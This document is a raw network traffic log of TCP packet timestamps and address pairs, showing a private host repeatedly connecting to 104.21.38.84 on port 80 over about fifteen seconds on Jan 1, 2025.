                                                                                                                                                                                            Jan 1, 2025 14:52:32.026859999 CET4978180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.097893953 CET4978180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.097893000 CET4978080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.098545074 CET4978280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.102931976 CET8049781104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.103005886 CET4978180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.103199959 CET8049780104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.103249073 CET4978080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.103415966 CET8049782104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.103485107 CET4978280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.103571892 CET4978280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.108417034 CET8049782104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.451190948 CET4978280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.456352949 CET8049782104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.578933001 CET8049782104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.620709896 CET4978280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.843348980 CET8049782104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.902060032 CET4978280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.958365917 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.963363886 CET8049783104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:32.963529110 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.963529110 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:32.968374968 CET8049783104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:33.308507919 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.313523054 CET8049783104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:33.426918983 CET8049783104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:33.471055031 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.682763100 CET8049783104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:33.729998112 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.773332119 CET8049783104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:33.823736906 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.923078060 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.924181938 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.928126097 CET8049783104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:33.928169012 CET4978380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.929039955 CET8049784104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:33.929096937 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.929259062 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:33.934091091 CET8049784104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:34.276952028 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.281907082 CET8049784104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:34.376506090 CET8049784104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:34.433131933 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.644387007 CET8049784104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:34.698836088 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.770344019 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.770565987 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.775389910 CET8049784104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:34.775470018 CET8049785104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:34.775533915 CET4978480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.775567055 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.775681019 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:34.782665014 CET8049785104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.120800018 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.125727892 CET8049785104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.240478992 CET8049785104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.292624950 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.421550989 CET8049785104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.464389086 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.536771059 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.537442923 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.542228937 CET8049785104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.542269945 CET8049786104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.542308092 CET4978580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.542352915 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.542504072 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.547296047 CET8049786104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.902036905 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:35.907026052 CET8049786104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:35.991522074 CET8049786104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.042654037 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.259244919 CET8049786104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.308151007 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.376421928 CET4978280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.381344080 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.381916046 CET4978780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.386394024 CET8049786104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.386456966 CET4978680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.386737108 CET8049787104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.386796951 CET4978780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.387100935 CET4978780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.391963959 CET8049787104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.745752096 CET4978780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.750694036 CET8049787104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.831913948 CET8049787104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.840270996 CET4978780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.840586901 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.845350981 CET8049787104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.845421076 CET4978780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.845475912 CET8049788104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.845544100 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.845633030 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.850488901 CET8049788104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.957321882 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.962307930 CET8049789104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:36.962385893 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.962460041 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:36.967297077 CET8049789104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.198889971 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.203844070 CET8049788104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.203924894 CET8049788104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.308198929 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.313129902 CET8049789104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.313612938 CET8049788104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.355025053 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.438461065 CET8049789104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.480022907 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.651196003 CET8049788104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.688648939 CET8049789104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.698774099 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.730036974 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.801117897 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.801158905 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.801970005 CET4979080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806241989 CET8049788104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806312084 CET4978880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806488991 CET8049789104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806534052 CET4978980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806843042 CET8049790104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806906939 CET4979080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.806979895 CET4979080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:37.811750889 CET8049790104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:38.152055979 CET4979080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:38.156966925 CET8049790104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:38.291757107 CET8049790104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:38.339504004 CET4979080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:38.547609091 CET8049790104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:38.589401960 CET4979080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:38.660835981 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:38.667342901 CET8049791104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:38.667427063 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:38.667593956 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:38.672974110 CET8049791104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.026979923 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.032098055 CET8049791104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.136480093 CET8049791104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.183163881 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.393894911 CET8049791104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.448791981 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.504551888 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.505179882 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.513417959 CET8049792104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.513519049 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.513586044 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.513605118 CET8049791104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.513662100 CET4979180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.518413067 CET8049792104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.872229099 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:39.877115965 CET8049792104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:39.973073006 CET8049792104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:40.026925087 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.145785093 CET8049792104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:40.198788881 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.270163059 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.270714998 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.275346041 CET8049792104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:40.275409937 CET4979280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.275626898 CET8049793104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:40.275688887 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.275779963 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.280637980 CET8049793104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:40.620811939 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.625825882 CET8049793104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:40.724850893 CET8049793104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:40.776773930 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:40.992047071 CET8049793104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.042628050 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.079430103 CET8049793104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.120691061 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.192734003 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.193305016 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.197801113 CET8049793104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.197876930 CET4979380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.198219061 CET8049794104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.198282957 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.198474884 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.203267097 CET8049794104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.543543100 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.548557997 CET8049794104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.642235041 CET8049794104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.683173895 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.825586081 CET8049794104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.870682955 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.942066908 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.942368031 CET4979580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.947223902 CET8049794104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.947267056 CET8049795104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:41.947289944 CET4979480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.947333097 CET4979580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.947452068 CET4979580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:41.952666998 CET8049795104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:42.292756081 CET4979580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.297888994 CET8049795104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:42.403363943 CET8049795104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:42.448829889 CET4979580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.657548904 CET4979580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.657959938 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.662638903 CET8049795104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:42.662796974 CET4979580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.662812948 CET8049796104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:42.662883043 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.662996054 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.667807102 CET8049796104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:42.770525932 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.775527000 CET8049797104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:42.775628090 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.775713921 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:42.780551910 CET8049797104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.011396885 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.016475916 CET8049796104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.016513109 CET8049796104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.107198954 CET8049796104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.120798111 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.125756979 CET8049797104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.151962996 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.221460104 CET8049797104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.277024031 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.291773081 CET8049796104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.339457989 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.482471943 CET8049797104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.526935101 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.598694086 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.598756075 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.599363089 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.603686094 CET8049796104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.603748083 CET4979680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.603964090 CET8049797104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.604007006 CET4979780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.604162931 CET8049798104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.604218960 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.604300022 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.609168053 CET8049798104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:43.948909044 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:43.953782082 CET8049798104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.098159075 CET8049798104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.151940107 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.367451906 CET8049798104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.417578936 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.487296104 CET4979080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.490288973 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.490977049 CET4979980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.495271921 CET8049798104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.495347023 CET4979880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.495793104 CET8049799104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.495872021 CET4979980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.496001959 CET4979980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.500849009 CET8049799104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.855182886 CET4979980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:44.861169100 CET8049799104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.939821959 CET8049799104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:44.995722055 CET4979980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:45.213793039 CET8049799104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:45.261461020 CET4979980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:45.341649055 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:45.347563028 CET8049800104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:45.347636938 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:45.347796917 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:45.353982925 CET8049800104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:45.699018002 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:45.703872919 CET8049800104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:45.833700895 CET8049800104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:45.886389971 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.006536007 CET8049800104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.058317900 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.129550934 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.130268097 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.134592056 CET8049800104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.134670973 CET4980080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.135226011 CET8049801104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.135302067 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.135413885 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.140322924 CET8049801104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.480454922 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.485507965 CET8049801104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.608587027 CET8049801104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.652084112 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.874351978 CET8049801104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.917707920 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.990053892 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.990689039 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.995141983 CET8049801104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.995204926 CET4980180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.995529890 CET8049802104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:46.995769978 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:46.996001005 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.000817060 CET8049802104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:47.355566025 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.360439062 CET8049802104.21.38.84192.168.2.4
